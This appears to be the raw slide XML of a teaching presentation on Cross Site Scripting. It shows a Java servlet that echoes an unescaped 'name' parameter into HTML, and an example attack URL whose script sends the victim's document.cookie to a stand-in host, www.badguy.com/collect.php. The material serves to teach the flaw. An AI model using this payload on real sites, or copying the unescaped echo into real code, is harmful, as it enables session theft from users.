                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pP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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>FORM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12762" y="3297298"/>
            <a:ext cx="6051176" cy="213049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lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>protected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-41" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" b="1" spc="-36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doGet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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HttpServletRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-36" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>request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,</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2478202">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HttpServletResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-91" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>response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)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="36"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1634">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="493911" marR="476045">
              <a:lnSpc>
                <a:spcPts val="1824"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="603100"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-14" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="603100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name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5" dirty="0"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spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>request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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>getParameter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(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name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)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>response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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>setContentType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(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text/html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)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="654706">
              <a:lnSpc>
                <a:spcPts val="1765"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" spc="-23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="493911">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>out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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>println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(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&lt;H1&gt;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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Hello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+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5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name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+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5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!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>H1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);</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5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spc="-23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="032CE6"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:endParaRPr sz="1543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1588">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11527"/>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1543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841735" y="1956096"/>
            <a:ext cx="6624021" cy="1875287"/>
            <a:chOff x="1885450" y="1767413"/>
            <a:chExt cx="7298690" cy="2066289"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2097004" y="2019299"/>
              <a:ext cx="6877050" cy="1574800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6877050" h="1574800">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6876473" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6876473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A6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5450" y="1767413"/>
              <a:ext cx="7298311" cy="2066230"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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0034" y="576303"/>
            <a:ext cx="4794837" cy="4725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7079" y="553251"/>
            <a:ext cx="2939143" cy="4956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73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2"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3449" spc="86" dirty="0"/>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="208" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="213" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="77" dirty="0"/>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="213" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="64" dirty="0"/>
              <a:t>(XSS):</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="77" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="213" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="213" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wrong?</a:t>
            </a:r>
            <a:endParaRPr sz="3449"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1333500"/>
            <a:ext cx="7821613" cy="2143125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23628">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="109"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="45" dirty="0"/>
              <a:t>Suppose</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="109" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="123" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="68" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="118" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="45" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="118" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="54" dirty="0"/>
              <a:t>given</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="118" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="118" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="185" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="123" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="59" dirty="0"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="118" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="123" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="118" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="36" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" spc="36" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="363929"/>
                  </a:solidFill>
                </a:uFill>
              </a:rPr>
              <a:t>www.badguy.com</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="36" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12103">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2723"/>
          </a:p>
          <a:p>
            <a:pPr marL="1215472">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E34ADC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="696969"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5555DD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.vulnerable.com/welcome.php?name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="696969"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1215472" marR="934800">
              <a:lnSpc>
                <a:spcPts val="1824"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="73"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="696969"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="696969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solidFill>
                  <a:srgbClr val="696969"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5555DD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.badguy.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5555DD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5555DD"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>collect.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="696969"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="696969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696969"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"+document.cookie)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-41" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="696969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solidFill>
                  <a:srgbClr val="696969"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1543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16527" y="3868180"/>
            <a:ext cx="6624021" cy="2804288"/>
            <a:chOff x="1953577" y="4262161"/>
            <a:chExt cx="7298690" cy="3089910"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2173268" y="4521200"/>
              <a:ext cx="6864350" cy="2590800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6864350" h="2590800">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6863763" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6863763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A6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3577" y="4262161"/>
              <a:ext cx="7298311" cy="308950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182803" y="3599736"/>
            <a:ext cx="7009568" cy="2363455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>
              <a:spcBef>
                <a:spcPts val="109"/>
              </a:spcBef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web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page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would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then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injected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with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following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spc="36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="41"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2723">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1280596">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" b="1" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700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  <a:p>
            <a:pPr marL="1634461">
              <a:lnSpc>
                <a:spcPts val="1828"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" b="1" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700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  <a:p>
            <a:pPr marL="1923776" marR="4611">
              <a:lnSpc>
                <a:spcPts val="1824"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="73"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" b="1" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>window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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>open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(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  <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.badguy.com/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collect.php?cookie=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14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+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cookie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)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-23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welcome</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9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our</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008C00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1634461">
              <a:lnSpc>
                <a:spcPts val="1770"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" b="1" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700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  <a:p>
            <a:pPr marL="1280596">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" b="1" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A65700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4" y="553251"/>
            <a:ext cx="5325035" cy="5301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3382" y="553251"/>
            <a:ext cx="2120793" cy="5186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5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4"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="100" dirty="0"/>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="231" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="236" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="103" dirty="0"/>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="231" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="86" dirty="0"/>
              <a:t>(XSS):</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="236" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="86" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summary!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63363" y="1447873"/>
            <a:ext cx="6645638" cy="4899768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80094" marR="4611" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86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An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attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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attaches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script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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with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an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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HTTP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response.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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script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executes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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="20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available</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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2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2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responding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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application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attacker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able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access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privileged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information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82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only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available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user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or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web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application.</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
